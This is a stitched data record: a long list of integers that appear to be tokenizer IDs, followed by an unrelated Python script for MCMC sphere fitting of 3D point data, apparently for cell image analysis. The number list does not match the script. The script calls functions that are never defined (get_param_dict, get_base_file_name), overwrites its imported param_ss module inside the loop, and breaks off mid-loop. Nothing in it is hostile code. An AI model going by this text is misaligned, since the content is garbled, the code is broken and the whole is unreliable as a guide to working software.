198,
6738,
267,
291,
13,
26791,
1330,
7497,
303,
62,
48553,
198,
6738,
267,
291,
13,
26791,
13,
18439,
77,
13,
18439,
77,
62,
22866,
1330,
26828,
77,
15783,
6122,
198,
6738,
267,
291,
13,
26791,
13,
18439,
77,
13,
18439,
77,
62,
22866,
1330,
787,
62,
18439,
62,
332,
1958,
198,
6738,
267,
291,
13,
26791,
13,
18439,
77,
13,
16366,
1330,
11767,
62,
16366,
198,
6738,
267,
291,
13,
26791,
13,
18439,
77,
13,
41684,
62,
18439,
1330,
26828,
77,
15732,
276,
12915,
4122,
36918,
2848,
198,
6738,
267,
291,
13,
26791,
13,
18439,
77,
13,
7220,
1330,
50069,
35215,
44,
25496,
198,
6738,
267,
291,
13,
26791,
13,
18439,
89,
1330,
26828,
89,
12885,
1359,
198,
6738,
267,
291,
13,
26791,
13,
4023,
62,
22602,
1330,
1635,
198,
6738,
267,
291,
13,
26791,
13,
2539,
952,
1330,
1994,
9491,
62,
15003,
198,
6738,
267,
291,
13,
26791,
13,
7220,
10951,
1330,
11787,
12360,
198,
6738,
267,
291,
13,
26791,
13,
12384,
35461,
1330,
440,
2149,
62,
1797,
12564,
1137,
198,
6738,
267,
291,
13,
26791,
13,
12384,
35461,
1330,
5313,
37,
3889,
628,
198,
6738,
23612,
9078,
1330,
266,
45213,
5847,
332,
198,
6738,
23612,
9078,
13,
18504,
70,
5847,
332,
13,
45163,
62,
18780,
259,
1330,
28477,
259,
31127,
47307,
198,
198,
6738,
267,
291,
13,
26791,
13,
82,
9945,
1330,
2251,
62,
29891,
62,
9945,
628,
198,
198,
25294,
30373,
796,
18931,
13,
1136,
11187,
1362,
7203,
4943,
198,
25294,
25664,
62,
20608,
796,
705,
420,
13,
6404,
6,
198,
31298,
14050,
796,
18931,
13,
8979,
25060,
7,
25294,
25664,
62,
20608,
8,
198,
8692,
62,
687,
1436,
796,
18931,
13,
8479,
1436,
7,
198,
220,
220,
220,
36521,
7,
292,
310,
524,
8,
82,
4064,
7,
3672,
8,
82,
25,
4,
7,
5715,
3672,
8,
82,
4064,
7,
20500,
8,
82,
4943,
198,
198,
34,
5662,
796,
19203,
4,
7,
292,
310,
524,
8,
82,
4064,
7,
3672,
8,
82,
25,
4,
7,
5715,
3672,
8,
82,
705,
198,
220,
220,
220,
220,
220,
220,
44438,
4,
7,
16366,
8,
82,
11,
4,
7,
6978,
8,
82,
11,
4,
7,
66,
312,
8,
82,
60,
4064,
7,
20500,
8,
82,
11537,
198,
13155,
66,
62,
687,
1436,
796,
18931,
13,
8479,
1436,
7,
34,
5662,
8,
198,
198,
31298,
14050,
13,
2617,
8479,
1436,
7,
8692,
62,
687,
1436,
8,
198,
25294,
30373,
13,
2860,
25060,
7,
31298,
14050,
8,
198,
25294,
30373,
13,
2617,
4971,
7,
6404,
2667,
13,
30531,
8,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
10786,
78,
291,
10697,
11537,
628,
198,
198,
2,
645,
1040,
14978,
9485,
3118,
411,
5634,
19927,
628,
628,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
628,
220,
220,
220,
6808,
796,
705,
19571,
6,
198,
220,
220,
220,
35847,
796,
37350,
8567,
929,
7,
12942,
1749,
41888,
15763,
1343,
705,
12966,
17041,
3256,
6808,
1343,
705,
4352,
31628,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8265,
62,
34945,
28,
15763,
1343,
705,
18170,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5128,
62,
12685,
7656,
11639,
40477,
12,
23,
3256,
5072,
62,
12685,
7656,
11639,
40477,
12,
23,
11537,
628,
220,
220,
220,
20579,
14478,
10879,
796,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
366,
7220,
16,
1298,
366,
16,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
7220,
17,
1298,
366,
17,
1,
198,
220,
220,
220,
1782,
628,
220,
220,
220,
9206,
12915,
12727,
15732,
796,
657,
220,
1303,
644,
318,
428,
11,
290,
644,
857,
663,
1988,
1612,
30,
628,
220,
220,
220,
1303,
449,
54,
27015,
25,
19449,
5313,
7383,
198,
220,
220,
220,
474,
86,
591,
8979,
5376,
796,
366,
12708,
14,
73,
86,
591,
13,
17752,
1,
628,
220,
220,
220,
1303,
21136,
262,
10007,
198,
220,
220,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
12,
66,
3256,
2244,
11639,
11250,
11537,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
12,
67,
3256,
2244,
11639,
24442,
3256,
2223,
11639,
8095,
62,
7942,
11537,
198,
220,
220,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
628,
220,
220,
220,
1303,
21136,
290,
9058,
8398,
198,
220,
220,
220,
4566,
796,
1330,
8019,
13,
11748,
62,
21412,
7,
22046,
13,
11250,
8,
198,
220,
220,
220,
4566,
13,
1797,
12564,
1137,
796,
4566,
13,
1797,
12564,
1137,
1343,
705,
29164,
92,
14,
4458,
18982,
7,
11250,
13,
15490,
8,
198,
220,
220,
220,
4566,
13,
35009,
27389,
21886,
796,
4566,
13,
35009,
27389,
21886,
13,
18982,
7,
747,
15573,
28,
11250,
13,
1797,
12564,
1137,
8,
198,
220,
220,
220,
886,
40710,
796,
4566,
13,
32,
24318,
3525,
2149,
6234,
14692,
12982,
35215,
1,
7131,
1,
12915,
40710,
8973,
198,
220,
220,
220,
1336,
12915,
40710,
15235,
796,
14631,
4,
82,
4,
82,
1,
4064,
357,
11250,
13,
1797,
12564,
1137,
11,
2462,
8,
329,
2462,
287,
886,
40710,
60,
198,
198,
2,
16926,
46,
25,
1521,
428,
9113,
3920,
4325,
523,
1903,
30,
460,
314,
1445,
340,
1568,
30,
198,
220,
220,
220,
1303,
1052,
440,
2389,
34,
35263,
14,
47649,
3299,
4382,
318,
3562,
284,
198,
220,
220,
220,
1303,
1249,
517,
621,
530,
18239,
2446,
284,
307,
973,
416,
262,
4382,
13,
198,
220,
220,
220,
1303,
843,
326,
318,
644,
262,
26828,
15783,
6122,
318,
329,
13,
198,
220,
220,
220,
1303,
11259,
1321,
546,
262,
1772,
5612,
2581,
11,
262,
26828,
15783,
6122,
198,
220,
220,
220,
1303,
19769,
543,
2446,
7,
82,
8,
284,
307,
973,
329,
8323,
12364,
262,
1048,
14,
26858,
13,
198,
220,
220,
220,
1303,
4784,
284,
262,
440,
2389,
34,
3210,
257,
4718,
8369,
3615,
460,
910,
198,
220,
220,
220,
1303,
705,
40,
765,
428,
2099,
286,
18239,
3256,
290,
262,
26828,
77,
15783,
6122,
8404,
284,
2298,
198,
220,
220,
220,
1303,
5050,
422,
262,
900,
340,
468,
587,
14275,
11,
284,
3975,
326,
2581,
13,
198,
220,
220,
220,
6284,
77,
15783,
6122,
796,
26828,
77,
15783,
6122,
3419,
628,
220,
220,
220,
1303,
50069,
35215,
44,
25496,
25,
16425,
292,
257,
2836,
1262,
262,
20579,
14,
28712,
1296,
287,
257,
198,
220,
220,
220,
1303,
25290,
18878,
2858,
1262,
15841,
78,
355,
11055,
1080,
198,
220,
220,
220,
20579,
35215,
30515,
77,
796,
50069,
35215,
44,
25496,
7,
198,
220,
220,
220,
220,
220,
220,
220,
6045,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
4382,
4554,
198,
220,
220,
220,
220,
220,
220,
220,
366,
38235,
13,
76,
25496,
1600,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
257,
285,
25496,
11055,
198,
220,
220,
220,
220,
220,
220,
220,
35847,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
35847,
11055,
198,
220,
220,
220,
220,
220,
220,
220,
20579,
14478,
10879,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
20579,
14,
28712,
22155,
12,
2339,
6831,
198,
220,
220,
220,
220,
220,
220,
220,
36521,
82,
9800,
1634,
1,
4064,
4566,
13,
1797,
12564,
1137,
11,
220,
1303,
810,
284,
3758,
262,
2836,
706,
18239,
198,
220,
220,
220,
220,
220,
220,
220,
6045,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
2169,
489,
62,
853,
62,
20786,
19153,
3228,
198,
220,
220,
220,
220,
220,
220,
220,
1336,
12915,
40710,
15235,
8,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
19637,
886,
13033,
628,
220,
220,
220,
1303,
26828,
77,
15732,
276,
12915,
4122,
36918,
2848,
318,
257,
29908,
1398,
329,
1262,
281,
18239,
8265,
351,
3294,
886,
13033,
13,
198,
220,
220,
220,
6284,
77,
15732,
276,
12915,
12727,
36918,
2848,
796,
26828,
77,
15732,
276,
12915,
4122,
36918,
2848,
7,
29460,
35215,
30515,
77,
11,
9206,
12915,
12727,
15732,
8,
628,
220,
220,
220,
6284,
77,
15783,
6122,
13,
2860,
7,
11250,
13,
32,
24318,
3525,
2149,
6234,
14692,
12982,
35215,
1,
7131,
1,
2246,
49,
33116,
220,
1303,
357,
30,
8133,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6284,
77,
15732,
276,
12915,
12727,
36918,
2848,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
357,
30,
8133,
2446,
25,
281,
27421,
286,
262,
18239,
2446,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4566,
13,
32,
24318,
3525,
2149,
6234,
14692,
12982,
35215,
1,
7131,
1,
8845,
9947,
33116,
220,
1303,
2324,
1241,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
4943,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
357,
30,
8133,
18239,
4934,
628,
220,
220,
220,
1303,
5633,
0,
198,
220,
220,
220,
6284,
89,
796,
26828,
89,
12885,
1359,
3419,
198,
220,
220,
220,
5456,
11012,
796,
7497,
303,
62,
48553,
13,
9654,
7,
11250,
13,
5097,
28495,
11012,
8,
628,
220,
220,
220,
1303,
554,
12,
30871,
1729,
12,
19276,
7609,
23575,
11012,
19089,
15161,
22906,
198,
220,
220,
220,
6246,
11012,
796,
2251,
62,
29891,
62,
9945,
7,
11250,
13,
1797,
12564,
1137,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3200,
28,
81,
358,
2536,
7,
2624,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9206,
28,
81,
358,
2536,
7,
2624,
4008,
628,
220,
220,
220,
10131,
796,
32549,
7,
198,
220,
220,
220,
220,
220,
220,
220,
1438,
28,
11250,
13,
1797,
12564,
1137,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1438,
198,
220,
220,
220,
220,
220,
220,
220,
264,
9945,
28,
29891,
11012,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
6246,
6831,
13,
198,
220,
220,
220,
220,
220,
220,
220,
269,
9945,
28,
16366,
11012,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5456,
6831,
198,
220,
220,
220,
220,
220,
220,
220,
6284,
77,
62,
7957,
6122,
28,
18439,
77,
15783,
6122,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
6284,
77,
20426,
198,
220,
220,
220,
220,
220,
220,
220,
2836,
10951,
28,
14202,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
2836,
1321,
198,
220,
220,
220,
220,
220,
220,
220,
6284,
89,
28,
18439,
89,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
6284,
89,
198,
220,
220,
220,
220,
220,
220,
220,
5456,
62,
18439,
77,
28,
332,
1958,
62,
16366,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5456,
18239,
198,
220,
220,
220,
220,
220,
220,
220,
5659,
2539,
28,
11250,
13,
23060,
44,
62,
20373,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
16718,
329,
1632,
3020,
19482,
1994,
18239,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
19016,
8899,
796,
6045,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1994,
9491,
796,
6045,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2583,
3672,
796,
366,
1600,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
11055,
62,
10920,
11882,
28,
76,
25496,
62,
10920,
11882,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
28703,
1586,
2183,
24019,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
11767,
62,
45163,
796,
6407,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
27882,
25952,
27802,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
9889,
796,
6045,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
32815,
796,
4946,
14255,
2395,
2611,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
474,
86,
591,
62,
9900,
796,
705,
3256,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
474,
86,
591,
62,
3672,
796,
705,
3256,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
2779,
6371,
28,
11250,
13,
1797,
12564,
1137,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5456,
62,
22583,
796,
6045,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5633,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
628,
220,
220,
220,
1303,
23575,
11012,
25,
198,
220,
220,
220,
1303,
770,
318,
6831,
810,
262,
10131,
7622,
1321,
546,
198,
220,
220,
220,
1303,
262,
44529,
14,
9800,
1417,
2985,
13,
632,
3407,
1321,
198,
220,
220,
220,
1303,
884,
355,
366,
10919,
468,
587,
1965,
329,
357,
6604,
82,
11,
629,
13920,
11,
290,
3503,
13,
1267,
1,
198,
220,
220,
220,
1303,
290,
366,
1169,
1181,
286,
262,
6246,
1911,
1318,
318,
530,
5726,
287,
262,
198,
220,
220,
220,
1303,
6831,
583,
1048,
198,
220,
220,
220,
1303,
198,
220,
220,
220,
1303,
220,
2602,
834,
5740,
220,
2602,
834,
198,
220,
220,
220,
1303,
10131,
13,
2539,
9491,
318,
281,
3499,
11507,
11,
198,
220,
220,
220,
1303,
3058,
340,
3544,
4277,
3815,
11,
475,
198,
220,
220,
220,
1303,
611,
345,
423,
640,
11,
340,
2861,
10240,
13,
628,
220,
220,
220,
329,
6284,
77,
15732,
276,
12915,
12727,
36918,
2848,
287,
6284,
77,
15783,
6122,
25,
198,
220,
220,
220,
220,
220,
220,
220,
6284,
77,
15732,
276,
12915,
12727,
36918,
2848,
13,
27891,
85,
796,
10131,
628,
220,
220,
220,
1303,
16926,
46,
25,
428,
318,
257,
966,
284,
2074,
25,
644,
611,
2836,
1366,
287,
257,
6831,
30,
198,
220,
220,
220,
611,
4566,
13,
29904,
10778,
6624,
366,
48913,
16437,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
10131,
13,
7220,
10951,
796,
11787,
12360,
7,
11250,
13,
29904,
11012,
8,
628,
220,
220,
220,
10131,
13,
44453,
62,
926,
75,
796,
4566,
13,
34,
15308,
40,
2767,
14990,
198,
220,
220,
220,
10131,
13,
44453,
62,
3672,
796,
4566,
13,
34,
15308,
40,
1677,
10067,
628,
220,
220,
220,
611,
26498,
13,
24442,
25,
198,
220,
220,
220,
220,
220,
220,
220,
10131,
13,
24442,
796,
6407,
628,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
449,
54,
42,
25,
19449,
5313,
7383,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
449,
54,
27015,
25,
318,
257,
22155,
286,
449,
54,
42,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
220,
2602,
834,
24550,
220,
2602,
834,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
449,
54,
27015,
4909,
2839,
1994,
1321,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1994,
9491,
62,
15003,
4566,
942,
40705,
1994,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1912,
319,
262,
2810,
8398,
366,
13083,
1911,
198,
220,
220,
220,
220,
220,
220,
220,
474,
86,
591,
796,
1994,
9491,
62,
15003,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10131,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
4382,
14,
16366,
4554,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4566,
13,
13083,
11,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1994,
8398,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5141,
62,
28243,
2625,
404,
4,
67,
4943,
220,
1303,
11055,
416,
543,
284,
1382,
262,
3988,
357,
2539,
4522,
11507,
8,
198,
220,
220,
220,
2845,
35528,
355,
11454,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
41605,
30373,
13,
18224,
7203,
9218,
9058,
4054,
25,
4064,
82,
1,
4064,
11454,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10131,
13,
2539,
62,
40406,
7203,
12708,
1600,
43237,
28,
4895,
18982,
1298,
366,
73,
43021,
1600,
366,
14016,
1298,
366,
3808,
64,
20662,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1994,
287,
474,
86,
591,
14692,
13083,
1,
5974,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
479,
287,
1994,
13,
13083,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1994,
58,
74,
60,
796,
355,
62,
46903,
1098,
7,
2539,
58,
74,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
277,
796,
1280,
7,
73,
86,
591,
8979,
5376,
11,
366,
86,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
277,
13,
13564,
7,
17752,
13,
67,
8142,
7,
73,
86,
591,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
277,
13,
19836,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
10131,
13,
73,
86,
591,
62,
9900,
796,
36521,
82,
4,
82,
1,
4064,
357,
15234,
1304,
13,
8692,
6371,
11,
474,
86,
591,
8979,
5376,
8,
628,
220,
220,
220,
1303,
329,
275,
287,
440,
1921,
13,
2539,
9491,
14692,
1,
5974,
198,
220,
220,
220,
1303,
220,
220,
220,
41605,
30373,
13,
10951,
7203,
4503,
18,
4382,
8251,
25,
4064,
82,
1,
4064,
275,
8,
628,
220,
220,
220,
1303,
16926,
46,
25,
20396,
25,
198,
220,
220,
220,
1303,
23578,
62,
16402,
12394,
318,
5447,
355,
257,
22155,
287,
262,
8398,
2393,
11,
198,
220,
220,
220,
1303,
1521,
407,
16215,
340,
355,
4731,
351,
366,
332,
1958,
1,
1988,
30,
198,
220,
220,
220,
1303,
706,
477,
11,
356,
423,
691,
530,
886,
966,
13,
198,
220,
220,
220,
1303,
460,
356,
423,
3294,
886,
2173,
329,
9206,
30,
1521,
30,
198,
220,
220,
220,
886,
12727,
796,
4566,
13,
32,
24318,
3525,
2149,
6234,
14692,
12982,
35215,
1,
7131,
1,
12915,
40710,
1,
7131,
28712,
12915,
12727,
15732,
60,
628,
220,
220,
220,
4808,
6371,
82,
796,
17635,
198,
220,
220,
220,
4808,
6371,
82,
13,
33295,
19510,
81,
6,
61,
6,
1343,
886,
12727,
11,
787,
62,
18439,
62,
332,
1958,
7,
18439,
77,
15732,
276,
12915,
12727,
36918,
2848,
13,
332,
1958,
22305,
628,
220,
220,
220,
4808,
1324,
796,
15678,
7,
15234,
1304,
11,
4808,
6371,
82,
8,
628,
220,
220,
220,
1303,
31122,
262,
3992,
4382,
198,
220,
220,
220,
4382,
796,
266,
45213,
5847,
332,
13,
34,
13372,
20519,
19416,
38,
1797,
18497,
7,
10786,
15,
13,
15,
13,
15,
13,
15,
3256,
4566,
13,
15490,
828,
4808,
1324,
13,
31438,
8,
1303,
9686,
66,
198,
220,
220,
220,
4382,
13,
45163,
62,
324,
3429,
796,
28477,
259,
31127,
47307,
7,
11250,
13,
35009,
5959,
62,
34,
17395,
11,
4566,
13,
35009,
5959,
62,
20373,
8,
628,
220,
220,
220,
3601,
7203,
46,
2389,
34,
32549,
4382,
2067,
357,
747,
15573,
34758,
5512,
2493,
34758,
30072,
1911,
18982,
7,
11250,
13,
1797,
12564,
1137,
11,
4566,
13,
15490,
4008,
628,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
4382,
13,
9688,
3419,
198,
220,
220,
220,
2845,
31973,
9492,
3622,
25,
198,
220,
220,
220,
220,
220,
220,
220,
4382,
13,
11338,
3419,
198
] | 2.322803 | 3,925 |
#!/usr/bin/env python
import argparse
import numpy as np
import os
import data_utils
import mle_sphere
import gen_sphere
import gen_sphere_grid
import gen_r_sig_3d
import gen_selection_in_g_3d
import metrics
import param_ss
import mle_priors_3d
DEFAULT_MLE_SPHERE_PARAM_DICT = dict(xc=0, yc=0, zc=0, r=1, rSig=0.3, xE=1.2, yE=1, zE=0.8)
GRID = np.array([-3, -2, -1, 1, 2, 3])
SCALEFACTOR = 1
parser = argparse.ArgumentParser()
parser.add_argument('--burnin', action='store', dest='burnin', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--input_dir', action='store', dest='input_dir', help='Directory of input csv image point files')
parser.add_argument('--nGrid', action='store', dest='nGrid', type=int, required=False, default=6, help='Not sure')
parser.add_argument('--output_csv_dir', action='store', dest='output_csv_dir', help='Directory to output csv files')
parser.add_argument('--output_json_dir', action='store', dest='output_json_dir', help='Directory to output json files')
parser.add_argument('--output_log', action='store', dest='output_log', help='Output process log file')
parser.add_argument('--plotFigures', action='store', dest='plotFigures', type=bool, required=False, default=False, help='Plot figures')
parser.add_argument('--randomStart', action='store', dest='randomStart', type=bool, required=False, default=True, help='Do not use DEFAULT_MLE_SPHERE_PARAM_DICT')
parser.add_argument("--fixR", action='store', dest='fixR', type=bool, required=False, default=True, help="Not sure")
parser.add_argument('--sample', action='store', dest='sample', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--thin', action='store', dest='thin', type=int, required=False, default=10, help='Not sure')
parser.add_argument('--xTau', action='store', dest='xTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yTau', action='store', dest='yTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zTau', action='store', dest='zTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--rTau', action='store', dest='rTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--xETau', action='store', dest='xETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yETau', action='store', dest='yETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zETau', action='store', dest='zETau', type=float, required=False, default=0.01, help='Not sure')
args = parser.parse_args()
param_dict = get_param_dict(args)
# TODO: nLevelSet = 150
log_fh = open(args.output_log, "w")
for file_name in sorted(os.listdir(args.input_dir)):
file_path = os.path.abspath(os.path.join(args.input_dir, file_name))
# Extract the cell_id from the file name.
cell_id = get_base_file_name(file_name)
# Load or generate synthetic level set data
# if params_dict['genData']:
if False:
# TODO: data = genSphereLevelSet(DEFAULT_MLE_SPHERE_PARAM_DICT, bounding_box, param_dict, nLevelSet)
meanR = [0, 0, 0]
# TODO: save(PrjCtrl.inputFileLevelSetDataM,'data')
else:
data = data_utils.load_raw3d_data(file_path)
log_fh.write("First 5 data points before normalization: {}\n".format(data[:5]))
data, meanR = data_utils.normalize_data(data, log_fh)
log_fh.write("\nFirst 5 data points after normalization: {}\n\n".format(data[:5]))
log_fh.write("mean radius {}".format(meanR))
# TODO: nLevelSet = data.shape[0]
# Set summary parameters
param_ss = param_ss.ParamSS(data.shape[0], meanR)
# Starting value for parameters
if param_dict['randomStart']:
mles_param_dict = mle_sphere.mle_sphere(data, cell_id, param_dict, log_fh)
else:
mles_param_dict = DEFAULT_MLE_SPHERE_PARAM_DICT
# Set Priors
prior = mle_priors_3d.MLEPriors3D(cMean=[mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc']],
cStd=[1, 1, 1],
rMean=mles_param_dict['r'],
rStd=0.1,
eMean=[mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE']],
eStd=[1, 1, 1])
# MCMC Analysis
for n in range(args.burnin + args.sample):
if (np.mod(n, args.thin) == 0 or n == 0):
log_fh.write("\nn {}\n".format(n))
mles_param_dict['cLogLike'] = metrics.calc_log_like_sphere_mix(mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc'],
mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE'],
mles_param_dict['r'],
data[mles_param_dict['sInGIndex'], :],
mles_param_dict['rSig'])
log_fh.write("\nmles_param_dict:\n")
log_fh.write("cLogLike {}\n".format(mles_param_dict['cLogLike']))
log_fh.write("xc {}\n".format(mles_param_dict['xc']))
log_fh.write("yc {}\n".format(mles_param_dict['yc']))
log_fh.write("zc {}\n".format(mles_param_dict['zc']))
log_fh.write("r {}\n".format(mles_param_dict['r']))
log_fh.write("xE {}\n".format(mles_param_dict['xE']))
log_fh.write("yE {}\n".format(mles_param_dict['yE']))
log_fh.write("zE {}\n".format(mles_param_dict['zE']))
log_fh.write("rSig {}\n".format(mles_param_dict['rSig']))
if args.plotFigures:
pass
tup = gen_sphere.gen_sphere(data, mles_param_dict, prior, param_dict)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
tup = gen_sphere_grid.gen_sphere_grid(data, mles_param_dict, prior, param_dict, SCALEFACTOR)
